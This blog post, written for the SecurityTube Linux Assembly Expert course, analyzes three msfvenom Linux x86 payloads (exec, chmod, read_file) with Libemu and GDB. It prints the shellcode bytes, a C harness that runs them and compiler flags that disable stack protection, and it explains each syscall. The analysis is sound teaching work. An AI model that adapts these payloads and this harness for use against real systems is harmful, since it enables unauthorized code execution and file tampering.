In the previous posts, we looked at creating shellcode. In this post, I will analyze three shellcodes generated with msfvenom, all targeting the Linux x86 architecture. The aim is to understand how these shellcodes are crafted and what happens in the background, i.e. which syscalls are invoked and which instructions set up their arguments.
Let’s jump directly to the first shellcode.
Linux/x86/exec
Creating a workable exploit
The first one we are going to look at is the linux/x86/exec payload. We will start by creating a workable exploit for this shellcode. The payload executes a command that the user supplies when the payload is generated. The following command generates a payload that executes “ifconfig”:
root@kali:~# msfvenom -p linux/x86/exec CMD=ifconfig -f C [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 44 bytes Final size of c file: 209 bytes unsigned char buf[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x09\x00\x00\x00\x69" "\x66\x63\x6f\x6e\x66\x69\x67\x00\x57\x53\x89\xe1\xcd\x80";
Note that we have used the -f flag to get the output in a format that can be embedded directly in our C program.

    #include <stdio.h>
    #include <string.h>

    unsigned char code[] = \
    "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
    "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x09\x00\x00\x00\x69"
    "\x66\x63\x6f\x6e\x66\x69\x67\x00\x57\x53\x89\xe1\xcd\x80";

    main()
    {
        printf("Executing Shellcode... \n");
        printf("******************************************************************************\n");
        int (*ret)() = (int(*)())code;
        ret();
    }
The final step is to compile this using gcc and then run it. We need to pass -fno-stack-protector to disable the stack protector and -z execstack to make the stack executable.
root@kali:~/slae/assignments/assignment-5# gcc -fno-stack-protector -z execstack -o linux_x86_exec linux_x86_exec.c linux_x86_exec.c:9:1: warning: return type defaults to ‘int’ [-Wimplicit-int] 9 | main() | ^~~~
Running the shellcode runs “ifconfig” on my system. The output is as shown.
Now that we have a workable exploit for exec shellcode, let’s move on to the analysis part.
What’s under the hood !
There are multiple ways to analyze the shellcode. I am going to use the following approach for this payload:
- Explore the payload using Libemu
- Load the program in GDB and perform step by step analysis
Libemu
Libemu is an x86 emulator that works well for shellcode analysis. For our purposes, we can feed the raw output of msfvenom to sctest, one of the tools that ships with Libemu. Installation and basic usage are covered elsewhere, so I will jump straight to the analysis.
Feeding sctest with raw exec payload from msfvenom gives the following output:
    root@kali:~/slae/assignments/assignment-5# msfvenom -p linux/x86/exec CMD=ifconfig -f raw | sctest -v -Ss 1000 |more
    [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 44 bytes
    verbose = 1
    execve
    int execve (const char *dateiname=00416fc0={/bin/sh}, const char * argv[], const char *envp[]);
    cpu error error accessing 0x00000004 not mapped
    stepcount 15
    int execve (
         const char * dateiname = 0x00416fc0 =>
               = "/bin/sh";
         const char * argv[] = [
               = 0x00416fb0 =>
                   = 0x00416fc0 =>
                       = "/bin/sh";
               = 0x00416fb4 =>
                   = 0x00416fc8 =>
                       = "-c";
               = 0x00416fb8 =>
                   = 0x0041701d =>
                       = "ifconfig";
               = 0x00000000 =>
                   none;
         ];
         const char * envp[] = 0x00000000 =>
             none;
    ) = 0;
As you can see, the output is quite clean because it is printed in a C-like format. We can deduce the following from it:
- The syscall being invoked is execve
- The program being run is /bin/sh
- The argument for this syscall is “/bin/sh -c ifconfig”
As you see, with just a single command, we know how the program was crafted by msfvenom.
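To make the sctest output concrete, here is a minimal C sketch of the argument vector it reports. The function name build_exec_argv is hypothetical and only illustrates the layout; it is not how msfvenom builds the payload.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: fill argv with the vector sctest reported,
   i.e. {"/bin/sh", "-c", cmd, NULL}. argv must have room for 4 entries. */
void build_exec_argv(const char *cmd, const char *argv[4])
{
    assert(cmd != NULL && argv != NULL);
    argv[0] = "/bin/sh";   /* program name, same string as the pathname */
    argv[1] = "-c";        /* tell the shell to run the next argument   */
    argv[2] = cmd;         /* the command chosen with CMD=...           */
    argv[3] = NULL;        /* execve requires a NULL-terminated vector  */
}
```

Passing the result to execve(argv[0], (char *const *)argv, NULL) from unistd.h would issue the same syscall with the same three arguments that the emulator shows.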
To dig deeper and see this shellcode in action, let’s load the executable we generated earlier in GDB.
GDB
GDB will help us step through each instruction and analyse the registers, memory locations, etc. This will provide us deeper understanding.
From Libemu, we already know that the execve syscall is being used. The man page gives its prototype as follows:
int execve(const char *pathname, char *const argv[], char *const envp[]);
Based on the information from the Libemu analysis, the arguments map to the following:
Register | Argument | Value |
---|---|---|
EAX | N.A. | 0xb |
EBX | *pathname | /bin/sh |
ECX | argv[] | Address of the pointer array {“/bin/sh”, “-c”, “ifconfig”, NULL} |
EDX | envp[] | 0 |
Let’s load the program in GDB and disassemble it. The breakpoint was set at code, which is the shellcode.
The above disassembly shows the code for our payload.
Let’s break up the code for better understanding. The first part is as follows:

    0x00404040 <+0>: push 0xb
    0x00404042 <+2>: pop eax
    0x00404043 <+3>: cdq

The initial instructions push 0xb onto the stack and then pop it into EAX. So, EAX is loaded with 0xb, which is the syscall number for execve. Then, cdq copies the sign bit of EAX (which is 0) into every bit of EDX. So, it sets EDX to NULL.
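The effect of cdq can be modelled in a few lines of C. This is only a sketch of the instruction's semantics; the names cdq_edx and cdq_selfcheck are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Model of cdq: return the value EDX holds after EAX is sign-extended
   into EDX:EAX. Every bit of EDX becomes a copy of bit 31 of EAX. */
uint32_t cdq_edx(uint32_t eax)
{
    return (eax & 0x80000000u) ? 0xFFFFFFFFu : 0u;
}

/* With EAX = 0xb the sign bit is clear, so EDX ends up as 0. */
void cdq_selfcheck(void)
{
    assert(cdq_edx(0xbu) == 0u);
}
```

This is why the trick only zeroes EDX when EAX is known to hold a small positive value, as it does here right after pop eax.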
    0x00404044 <+4>: push edx
    0x00404045 <+5>: pushw 0x632d
    0x00404049 <+9>: mov edi,esp

Next, NULL (the value of EDX) is pushed on the stack, followed by the 16-bit value 0x632d, which is “-c” in little-endian byte order. The next instruction copies ESP into EDI. So, EDI points to “-c” followed by NULL. The following will make this clearer.
(gdb) break *0x0040404b Breakpoint 2 at 0x40404b (gdb) c Continuing. Breakpoint 2, 0x0040404b in code () (gdb) disassemble $eip,+10 Dump of assembler code from 0x40404b to 0x404055: => 0x0040404b <code+11>: push 0x68732f 0x00404050 <code+16>: push 0x6e69622f End of assembler dump. (gdb) print /x $edi $1 = 0xbffff156 (gdb) x/s 0xbffff156 0xbffff156: "-c"
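    0x0040404b <+11>: push 0x68732f
    0x00404050 <+16>: push 0x6e69622f
    0x00404055 <+21>: mov ebx,esp
    0x00404057 <+23>: push edx

The first two instructions push “/bin/sh” onto the stack: 0x68732f is “/sh” plus a terminating NULL byte, and 0x6e69622f is “/bin”. Then ESP is copied to EBX (*pathname), which now points to “/bin/sh” followed by NULL. The final push edx places a NULL on the stack, which will terminate the argv array.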
Dump of assembler code from 0x40404b to 0x404055: => 0x0040404b <code+11>: push 0x68732f 0x00404050 <code+16>: push 0x6e69622f End of assembler dump. (gdb) stepi 0x00404050 in code () (gdb) disassemble $eip,+10 Dump of assembler code from 0x404050 to 0x40405a: => 0x00404050 <code+16>: push 0x6e69622f 0x00404055 <code+21>: mov ebx,esp 0x00404057 <code+23>: push edx 0x00404058 <code+24>: call 0x404066 <code+38> End of assembler dump. (gdb) print /x $esp $2 = 0xbffff152 (gdb) x/s 0xbffff152 0xbffff152: "/sh" (gdb) stepi 0x00404055 in code () (gdb) print /x $esp $3 = 0xbffff14e (gdb) x/s 0xbffff14e 0xbffff14e: "/bin/sh"
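The way a pushed immediate turns into a string in memory can be sketched in C. The helper name imm32_to_str is an assumption made for this example; it simply lays the four bytes out in little-endian order, the way push stores them.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: write the four bytes of a 32-bit immediate in
   memory (little-endian) order into out, then NUL-terminate it.
   out must have room for 5 bytes. */
void imm32_to_str(uint32_t imm, char out[5])
{
    assert(out != 0);
    for (int i = 0; i < 4; i++)
        out[i] = (char)((imm >> (8 * i)) & 0xFF);  /* lowest byte first */
    out[4] = '\0';
}
```

Calling it with 0x6e69622f yields “/bin” and with 0x68732f yields “/sh” (the top byte is already 0x00), which matches the two x/s results in the GDB session above.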
    0x00404058 <+24>: call 0x404066 <code+38>
    0x0040405d <+29>: imul esp,DWORD PTR [esi+0x63],0x69666e6f
The next bit is interesting. We encounter a call instruction. The call instruction pushes the address of next instruction to be executed on the stack and then jumps to the defined address. This means 0x0040405d should be pushed on the stack. This is verified below. Also, upon examining this memory address, we can see that this is the actual command of our payload – ifconfig.
(gdb) stepi (gdb) disassemble $eip,+10 Dump of assembler code from 0x404066 to 0x404070: => 0x00404066 <code+38>: push edi 0x00404067 <code+39>: push ebx 0x00404068 <code+40>: mov ecx,esp 0x0040406a <code+42>: int 0x80 0x0040406c <code+44>: add BYTE PTR [eax],al 0x0040406e: add BYTE PTR [eax],al End of assembler dump. (gdb) print /x $esp $5 = 0xbffff146 (gdb) x/w 0xbffff146 0xbffff146: 0x0040405d (gdb) x/s 0x0040405d 0x40405d <code+29>: "ifconfig"
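The return address and the call target can also be worked out by hand from the raw bytes. The sketch below assumes the standard E8 rel32 encoding of a near call; the function name decode_call_rel32 is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Given shellcode bytes and the offset of an E8 (call rel32) opcode,
   compute the offset that gets pushed as the return address and the
   offset execution jumps to. */
void decode_call_rel32(const unsigned char *code, size_t off,
                       size_t *ret_off, size_t *target_off)
{
    assert(code != NULL && ret_off != NULL && target_off != NULL);
    assert(code[off] == 0xE8);

    /* rel32 is stored little-endian right after the opcode */
    uint32_t raw = (uint32_t)code[off + 1]
                 | (uint32_t)code[off + 2] << 8
                 | (uint32_t)code[off + 3] << 16
                 | (uint32_t)code[off + 4] << 24;
    int32_t rel = (int32_t)raw;

    *ret_off = off + 5;  /* the instruction is 5 bytes long */
    *target_off = (size_t)((int64_t)*ret_off + rel);
}
```

For the exec payload, the call sits at offset 24 with rel32 = 9, so the pushed return address is code+29 (where “ifconfig” is stored) and execution continues at code+38, matching the GDB output.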
    => 0x00404066 <code+38>: push edi
       0x00404067 <code+39>: push ebx
       0x00404068 <code+40>: mov ecx,esp
       0x0040406a <code+42>: int 0x80

The next instructions push EDI, which points to “-c”, and then EBX, which points to “/bin/sh”. ECX is then loaded with ESP. So, to conclude, ECX (argv) now points to an array of four pointers on the stack: “/bin/sh”, “-c”, “ifconfig” and a terminating NULL. Together they form the command line “/bin/sh -c ifconfig”.
(gdb) disassemble $eip,+10 Dump of assembler code from 0x404066 to 0x404070: => 0x00404066 <code+38>: push edi 0x00404067 <code+39>: push ebx 0x00404068 <code+40>: mov ecx,esp 0x0040406a <code+42>: int 0x80 0x0040406c <code+44>: add BYTE PTR [eax],al 0x0040406e: add BYTE PTR [eax],al End of assembler dump. (gdb) break *0x0040406a Breakpoint 3 at 0x40406a (gdb) c Continuing. Breakpoint 3, 0x0040406a in code () (gdb) disassemble $eip,+5 Dump of assembler code from 0x40406a to 0x40406f: => 0x0040406a <code+42>: int 0x80 0x0040406c <code+44>: add BYTE PTR [eax],al 0x0040406e: add BYTE PTR [eax],al End of assembler dump. (gdb) print /x $ecx $6 = 0xbffff13e (gdb) x/4w 0xbffff13e 0xbffff13e: 0xbffff14e 0xbffff156 0x0040405d 0x00000000 (gdb) x/s 0xbffff14e 0xbffff14e: "/bin/sh" (gdb) x/s 0xbffff156 0xbffff156: "-c" (gdb) x/s 0x0040405d 0x40405d <code+29>: "ifconfig"
Continuing the program runs ifconfig. This concludes analysis of Linux/x86/exec shellcode.
Linux/x86/chmod
Creating a workable exploit
Next up for analysis is linux/x86/chmod. This payload runs chmod on a specified file with a specified mode. We will use msfvenom to create a payload that changes the mode of /root/slae/assignments/assignment-5/permtest.txt to 0777.
root@kali:~# msfvenom -p linux/x86/chmod FILE=/root/slae/assignments/assignment-5/permtest.txt MODE=0777 -f C [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 73 bytes Final size of c file: 331 bytes unsigned char buf[] = "\x99\x6a\x0f\x58\x52\xe8\x31\x00\x00\x00\x2f\x72\x6f\x6f\x74" "\x2f\x73\x6c\x61\x65\x2f\x61\x73\x73\x69\x67\x6e\x6d\x65\x6e" "\x74\x73\x2f\x61\x73\x73\x69\x67\x6e\x6d\x65\x6e\x74\x2d\x35" "\x2f\x70\x65\x72\x6d\x74\x65\x73\x74\x2e\x74\x78\x74\x00\x5b" "\x68\xff\x01\x00\x00\x59\xcd\x80\x6a\x01\x58\xcd\x80";
Embedding the above shellcode in our C skeleton exploit and running it (using the same steps as earlier), we see that the permissions of the file have been modified.
root@kali:~/slae/assignments/assignment-5# ls -l permtest.txt -rw-r--r-- 1 root root 20 Sep 12 07:16 permtest.txt root@kali:~/slae/assignments/assignment-5# ./linux_x86_chmod Shellcode length: 7 root@kali:~/slae/assignments/assignment-5# ls -l permtest.txt -rwxrwxrwx 1 root root 20 Sep 12 07:16 permtest.txt
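The run above prints “Shellcode length: 7” although the payload is 73 bytes long. Assuming that this build of the skeleton prints strlen(code), which is a guess since that version of the program is not shown here, the number is simply the count of bytes before the first 0x00. A minimal sketch with hypothetical names:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* First 15 bytes of the chmod payload shown above */
const unsigned char chmod_head[] =
    "\x99\x6a\x0f\x58\x52\xe8\x31\x00\x00\x00\x2f\x72\x6f\x6f\x74";

/* Length as strlen() sees it: counting stops at the first 0x00 byte,
   which here is part of the call instruction's rel32 operand. */
size_t strlen_length(const unsigned char *code)
{
    assert(code != NULL);
    return strlen((const char *)code);
}
```

For chmod_head this gives 7, whereas sizeof(chmod_head) - 1 gives the true 15 bytes of the excerpt. Payloads that contain NULL bytes therefore need sizeof rather than strlen to report their real size.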
What’s under the hood !
GDB
For this exploit, we will directly jump into GDB for analysis. Hooking the program and breaking at code brings us to the following screen:
Let’s break up this code and walk through one section at a time.

    Dump of assembler code for function code:
    => 0x00404040 <+0>: cdq
       0x00404041 <+1>: push 0xf
       0x00404043 <+3>: pop eax
       0x00404044 <+4>: push edx
The code starts with cdq instruction that sets EDX to NULL. Then 0xf is moved to EAX using push and pop instructions. This confirms that the syscall being invoked is chmod. The man reference can now be queried to know the parameters needed for this syscall.
int chmod(const char *pathname, mode_t mode);
Pathname points to the file on which changes need to be made. Mode specifies the new bit mask to be set for the file.
Let’s step into the next section of the instruction.
    0x00404045 <+5>: call 0x40407b <code+59>
    0x0040404a <+10>: das

The next instruction is a call. This means that the address of the bytes following it (0x0040404a) is pushed on the stack as the return address. GDB disassembles those bytes as meaningless instructions such as das, but examining them as a string confirms that they hold the path of the file on which changes need to be made.
(gdb) x/s 0x0040404a 0x40404a <code+10>: "/root/slae/assignments/assignment-5/permtest.txt"
Let’s step into the next instructions.

    0x0040407b <+59>: pop ebx
    0x0040407c <+60>: push 0x1ff
    0x00404081 <+65>: pop ecx
    0x00404082 <+66>: int 0x80

The first instruction pops the top of the stack (the address of the file pathname) into EBX. Then ECX is populated with 0x1ff using push and pop instructions. 0x1ff is 777 in octal, which is the new file permission mode. After this, the syscall is executed.
The following summarizes the values in registers EAX, EBX and ECX just before the syscall. The instructions that follow it (push 0x1, pop eax, int 0x80) invoke the exit syscall to terminate the program.
(gdb) disassemble $eip,+10 Dump of assembler code from 0x404082 to 0x40408c: => 0x00404082 <code+66>: int 0x80 0x00404084 <code+68>: push 0x1 0x00404086 <code+70>: pop eax 0x00404087 <code+71>: int 0x80 0x00404089 <code+73>: add BYTE PTR [eax],al 0x0040408b: add BYTE PTR [eax],al End of assembler dump. (gdb) print /x $eax $1 = 0xf (gdb) print /x $ebx $2 = 0x40404a (gdb) x/s 0x40404a 0x40404a <code+10>: "/root/slae/assignments/assignment-5/permtest.txt" (gdb) print /x $ecx $3 = 0x1ff
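To see how 0x1ff relates to the rwxrwxrwx shown by ls -l, the nine permission bits can be rendered in C. This is an illustrative sketch; mode_to_string is a made-up name and it ignores the setuid, setgid and sticky bits.

```c
#include <assert.h>
#include <stddef.h>

/* Render the low nine permission bits of mode as an ls-style string
   such as "rwxrwxrwx". out must have room for 10 bytes. */
void mode_to_string(unsigned int mode, char out[10])
{
    static const char flags[] = "rwxrwxrwx";
    assert(out != NULL);
    for (int i = 0; i < 9; i++)
        out[i] = (mode & (1u << (8 - i))) ? flags[i] : '-';  /* bit 8 is user-read */
    out[9] = '\0';
}
```

With mode = 0x1ff all nine bits are set, so every position keeps its letter. With 0644, the mode the file had before the payload ran, the result is rw-r--r--.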
Linux/x86/read_file
Creating a workable exploit
The third and last payload we will analyze is linux/x86/read_file. When executed, this payload reads a file from the file system and writes its contents to the specified file descriptor.
In our case, let’s create shellcode to read a file on the local system (/root/slae/assignments/assignment-5/readfile.txt) and print it on the screen (FD=1).
root@kali:~# msfvenom -p linux/x86/read_file FD=1 PATH=/root/slae/assignments/assignment-5/readfile.txt -f C [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 110 bytes Final size of c file: 488 bytes unsigned char buf[] = "\xeb\x36\xb8\x05\x00\x00\x00\x5b\x31\xc9\xcd\x80\x89\xc3\xb8" "\x03\x00\x00\x00\x89\xe7\x89\xf9\xba\x00\x10\x00\x00\xcd\x80" "\x89\xc2\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xcd\x80\xb8" "\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xc5\xff\xff" "\xff\x2f\x72\x6f\x6f\x74\x2f\x73\x6c\x61\x65\x2f\x61\x73\x73" "\x69\x67\x6e\x6d\x65\x6e\x74\x73\x2f\x61\x73\x73\x69\x67\x6e" "\x6d\x65\x6e\x74\x2d\x35\x2f\x72\x65\x61\x64\x66\x69\x6c\x65" "\x2e\x74\x78\x74\x00";
Following the same steps as we did in the first shellcode, we need to embed this in our C skeleton exploit code and then compile it. Once run, you can see that the file is read and the output is printed on the screen.
Now that we have a workable exploit, let’s move to the analysis part.
What’s under the hood !
GDB
To start with, the program was hooked with GDB and then a breakpoint was set at code, which is the actual shellcode in our exploit. The complete disassembly is shown below:
(gdb) break *&code Breakpoint 1 at 0x4040 (gdb) run Starting program: /root/slae/assignments/assignment-5/linux_x86_read_file Shellcode length: 4 Breakpoint 1, 0x00404040 in code () (gdb) disassemble Dump of assembler code for function code: => 0x00404040 <+0>: jmp 0x404078 <code+56> 0x00404042 <+2>: mov eax,0x5 0x00404047 <+7>: pop ebx 0x00404048 <+8>: xor ecx,ecx 0x0040404a <+10>: int 0x80 0x0040404c <+12>: mov ebx,eax 0x0040404e <+14>: mov eax,0x3 0x00404053 <+19>: mov edi,esp 0x00404055 <+21>: mov ecx,edi 0x00404057 <+23>: mov edx,0x1000 0x0040405c <+28>: int 0x80 0x0040405e <+30>: mov edx,eax 0x00404060 <+32>: mov eax,0x4 0x00404065 <+37>: mov ebx,0x1 0x0040406a <+42>: int 0x80 0x0040406c <+44>: mov eax,0x1 0x00404071 <+49>: mov ebx,0x0 0x00404076 <+54>: int 0x80 0x00404078 <+56>: call 0x404042 <code+2> 0x0040407d <+61>: das 0x0040407e <+62>: jb 0x4040ef 0x00404080 <+64>: outs dx,DWORD PTR ds:[esi] 0x00404081 <+65>: je 0x4040b2 0x00404083 <+67>: jae 0x4040f1 0x00404085 <+69>: popa 0x00404086 <+70>: gs das 0x00404088 <+72>: popa 0x00404089 <+73>: jae 0x4040fe 0x0040408b <+75>: imul esp,DWORD PTR [edi+0x6e],0x746e656d 0x00404092 <+82>: jae 0x4040c3 0x00404094 <+84>: popa 0x00404095 <+85>: jae 0x40410a 0x00404097 <+87>: imul esp,DWORD PTR [edi+0x6e],0x746e656d 0x0040409e <+94>: sub eax,0x65722f35 0x004040a3 <+99>: popa 0x004040a4 <+100>: imul bp,WORD PTR fs:[ebp+eiz*2+0x2e],0x7874 0x004040ac <+108>: je 0x4040ae <code+110> 0x004040ae <+110>: add BYTE PTR [eax],al End of assembler dump.
Let’s break this into sections.
Dump of assembler code for function code: => 0x00404040 <+0>: jmp 0x404078 <code+56> 0x00404042 <+2>: mov eax,0x5 0x00404047 <+7>: pop ebx 0x00404048 <+8>: xor ecx,ecx 0x0040404a <+10>: int 0x80 0x0040404c <+12>: mov ebx,eax 0x0040404e <+14>: mov eax,0x3 0x00404053 <+19>: mov edi,esp 0x00404055 <+21>: mov ecx,edi 0x00404057 <+23>: mov edx,0x1000 0x0040405c <+28>: int 0x80 0x0040405e <+30>: mov edx,eax 0x00404060 <+32>: mov eax,0x4 0x00404065 <+37>: mov ebx,0x1 0x0040406a <+42>: int 0x80 0x0040406c <+44>: mov eax,0x1 0x00404071 <+49>: mov ebx,0x0 0x00404076 <+54>: int 0x80 0x00404078 <+56>: call 0x404042 <code+2> 0x0040407e <+62>: jb 0x4040ef
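Here is how the first syscall unfolds. The shellcode opens with the classic JMP-CALL-POP technique: the jmp at code+0 lands on the call at code+56, the call pushes the address of the bytes that follow it (0x0040407d) and jumps back to code+2, and the pop ebx at code+7 loads that address into EBX. Those bytes are nothing but the path of the file that needs to be read. Note that the dump below starts one byte later, at 0x0040407e, which is why the leading “/” is missing from the string.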
(gdb) x/s 0x0040407e 0x40407e <code+62>: "root/slae/assignments/assignment-5/readfile.txt"
Also, EAX is populated with 0x5, which is the syscall number for the open syscall. After that, ECX is XORed with itself to set it to 0. The man reference of the open syscall is shown below:
int open(const char *pathname, int flags)
Comparing this to the values populated in the registers, we can confirm that EAX is loaded with the syscall number, EBX holds the pointer to the pathname, and flags is set to 0 (O_RDONLY) through ECX. After this, the open syscall is invoked and our file is opened.
Now, let’s look at the second syscall.
    0x0040404c <+12>: mov ebx,eax
    0x0040404e <+14>: mov eax,0x3
    0x00404053 <+19>: mov edi,esp
    0x00404055 <+21>: mov ecx,edi
    0x00404057 <+23>: mov edx,0x1000
    0x0040405c <+28>: int 0x80

Looking at the value 0x3 being loaded into the EAX register, we know that this is the read syscall. Before that, EBX is loaded with the value in EAX, which is the file descriptor returned by the open syscall. The man reference of the read syscall is as follows:
ssize_t read(int fd, void *buf, size_t count);
We already have EAX populated with the syscall number and EBX with fd, which is the file descriptor of the file to be read. The next instructions copy the value of ESP into ECX (via EDI), which is the second argument, *buf. This points to a valid location on the stack that serves as the buffer the file is read into. In the next instruction, EDX is set to 0x1000 for the third argument, count, which is 4096 in decimal. After this, the syscall is invoked.
Our next step is to write the output back. In this case, the output is written on the screen. Let’s look at the next syscall to demystify this.
    0x0040405e <+30>: mov edx,eax
    0x00404060 <+32>: mov eax,0x4
    0x00404065 <+37>: mov ebx,0x1
    0x0040406a <+42>: int 0x80
    0x0040406c <+44>: mov eax,0x1
    0x00404071 <+49>: mov ebx,0x0
    0x00404076 <+54>: int 0x80

Since EAX is loaded with 0x4, which is the write syscall, let’s look at the man reference of this syscall:
ssize_t write(int fd, const void *buf, size_t count);
The first instruction copies the value of EAX, which is the return value of the previous syscall, into EDX. This populates EDX, the count argument, with the number of bytes read. ECX is left untouched, so it still points to the buffer that read filled.
Then EBX is loaded with 1, which is the value of the file descriptor fd. That means that the output will be written to STDOUT. After this, the syscall is invoked and we see the output on the screen. The last three instructions load EAX with 0x1 and EBX with 0x0 and invoke the exit syscall, so the program terminates with status 0.
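Putting the three syscalls together, the payload's logic can be sketched in C roughly as follows. The function name read_file_to_fd is hypothetical, and unlike the shellcode this version checks for errors and closes the file, so it is an approximation rather than a byte-for-byte equivalent.

```c
#include <assert.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

/* open -> read (at most 4096 bytes) -> write, mirroring the payload.
   Returns the number of bytes written, or -1 on error. */
ssize_t read_file_to_fd(const char *path, int out_fd)
{
    char buf[0x1000];                       /* the shellcode uses the stack too */
    assert(path != NULL);

    int fd = open(path, O_RDONLY);          /* eax=5, ebx=path, ecx=0 */
    if (fd < 0)
        return -1;

    ssize_t n = read(fd, buf, sizeof buf);  /* eax=3, ebx=fd, ecx=buf, edx=0x1000 */
    close(fd);
    if (n < 0)
        return -1;

    return write(out_fd, buf, (size_t)n);   /* eax=4, ebx=out_fd, edx=bytes read */
}
```

Calling read_file_to_fd with the readfile.txt path and 1 as the descriptor would print the file on STDOUT, as the shellcode does. Like the payload, it performs a single read, so anything beyond the first 4096 bytes of the file is not copied.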
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3
Student ID: PA-16521
The code is also stored at GitHub. Thanks for reading !